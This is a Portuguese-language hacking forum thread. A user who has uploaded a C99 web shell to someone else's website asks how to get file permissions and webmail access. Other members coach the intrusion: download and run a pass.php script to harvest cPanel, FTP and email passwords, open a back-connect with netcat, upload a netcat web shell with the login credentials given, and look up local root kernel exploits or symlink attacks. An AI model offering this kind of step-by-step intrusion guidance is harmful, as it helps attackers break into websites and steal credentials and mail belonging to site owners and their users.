Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Shell C99

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Shell C99

    Eae galera direto ao ponto consegui upar a shell c99 em um site e acessa-la porém quando tento alterar arquivos e permissões de pasta fala que eu não tenho permissão.Alguem sabe como resolver isso ai ? Outra duvida é como entrar no webmail do dominio tem a possibilidade ?

  • Font Size
    #2
    Faz o back-connect e tenta fazer assim:

    wget -O pass.php Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    chmod 755 pass.php

    php pass.php



    Ai você vai conseguir as senhas do cpanel, se você conseguir as senhas do cpanel você tem acesso a digamos, TUDO, ftp, senha dos e-mails, sub-domínios.

    Att. Cr4t3r
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.

    Comment


    • Font Size
      #3
      Postado Originalmente por gorilas00 Ver Post
      Eae galera direto ao ponto consegui upar a shell c99 em um site e acessa-la porém quando tento alterar arquivos e permissões de pasta fala que eu não tenho permissão.Alguem sabe como resolver isso ai ? Outra duvida é como entrar no webmail do dominio tem a possibilidade ?
      Dependendo do servidor da para ler apenas textos sabendo o diretório correto, todas imagens e arquivos que foram indexados nos e-mails vc pode obter o código deles mas não consegue reconstrui-los novamente (eu pelomenos nunca consegui) mas caso vc consiga o que o Cr4t3r lhe recomendou é muito melhor.

      Comment


      • Font Size
        #4
        galera até hoje nao conseui upar uma shell c99 .Aalguem poderia explicar melhor

        Comment


        • Font Size
          #5
          galera euaindanao consegui upar uma shell c99 alguem pode me explicar melhor ?

          Comment


          • Font Size
            #6
            O que posso tá errando no back connect , fui na parte bind da shell c99 cliquei em connect me deu a seguinte mensagem :
            Result of back connection:
            Now script try connect to MEU_IP:11457...

            dei o comando nc -vv IP_SITE 11457

            mas ele nao responde fica um tempo e da Connection Time Out

            Comment


            • Font Size
              #7
              Postado Originalmente por gorilas00 Ver Post
              O que posso tá errando no back connect , fui na parte bind da shell c99 cliquei em connect me deu a seguinte mensagem :
              Result of back connection:
              Now script try connect to MEU_IP:11457...

              dei o comando nc -vv IP_SITE 11457

              mas ele nao responde fica um tempo e da Connection Time Out
              Faz com netcat shell então no próprio browser.

              Comment


              • Font Size
                #8
                Como assim pelo browser , poderia detalhar mais não entendi muito bem , faltei nessa aula hahahaha

                Comment


                • Font Size
                  #9
                  Postado Originalmente por gorilas00 Ver Post
                  Como assim pelo browser , poderia detalhar mais não entendi muito bem , faltei nessa aula hahahaha
                  Download da Netcat Shell - (Não fui eu que criei e nem que encodei)
                  Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                  Senha para logar nela:

                  login: root
                  senha: cr4ckers.com

                  Sobe ela para o site e loga com as senhas acima na shell, após isso sobe o arquivo pass.php (que o Cr4t3r postou) para o site e após isso siga os comandos dê permissão:

                  chmod 755 pass.php

                  Após isso:

                  php pass.php

                  -----------------------------------------------
                  Aqui caso vc ache o diretório (e tiver permissões) como eu tinha postado acima vc vai conseguir ler desta maneira abaixo, o lado bom é que não precisa de cpanel e nem ser root, o lado ruim é que não consegue reconstruir os arquivos que forem enviados.

                  Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


                  Veja bem isso é apenas uma demonstração eu espero que vc não prejudique ninguém (pelomenos não é essa minha intenção em estar ajudando).

                  Comment


                  • Font Size
                    #10
                    Olha a mesagem que deu .. pela shell da c99 eu conseguia chegar até chegar aqui , a mensagem diz que eu tenho que logar como administrador isso eu nao entendi muito bem , se eu estou com a shell upadada eu não tenho acesso total ??

                    Comment


                    • Font Size
                      #11
                      Postado Originalmente por gorilas00 Ver Post
                      Olha a mesagem que deu .. pela shell da c99 eu conseguia chegar até chegar aqui , a mensagem diz que eu tenho que logar como administrador isso eu nao entendi muito bem , se eu estou com a shell upadada eu não tenho acesso total ??
                      Não.

                      Vc precisa ver a versão do Kernel
                      uname -a
                      e procurar um exploit pra local root da versão dele ou qualquer outro que vc consiga root na versão especifica do kernel.

                      Tava bem claro no código que o Cr4t3r passou que precisava ser root.

                      Comment


                      • Font Size
                        #12
                        Me retornou essa linha Linux 3.10.17-king-centos5 #1 SMP Thu Oct 24 13:18:24 BRST 2013 x86_64 , procurei por " Linux 3.10.17-king-centos5 " não achei nada

                        Comment


                        • Font Size
                          #13
                          Postado Originalmente por gorilas00 Ver Post
                          Me retornou essa linha Linux 3.10.17-king-centos5 #1 SMP Thu Oct 24 13:18:24 BRST 2013 x86_64 , procurei por " Linux 3.10.17-king-centos5 " não achei nada
                          Procura em sites especificos para isso como Exploit-db, Security Focus, 1337 e vários outros.

                          Tenta com Symlink que não precisa de root, porém se não conseguir com Symlink a única opção dai é ser root pra conseguir o que vc quer.

                          Comment

                          X
                          Working...
                          X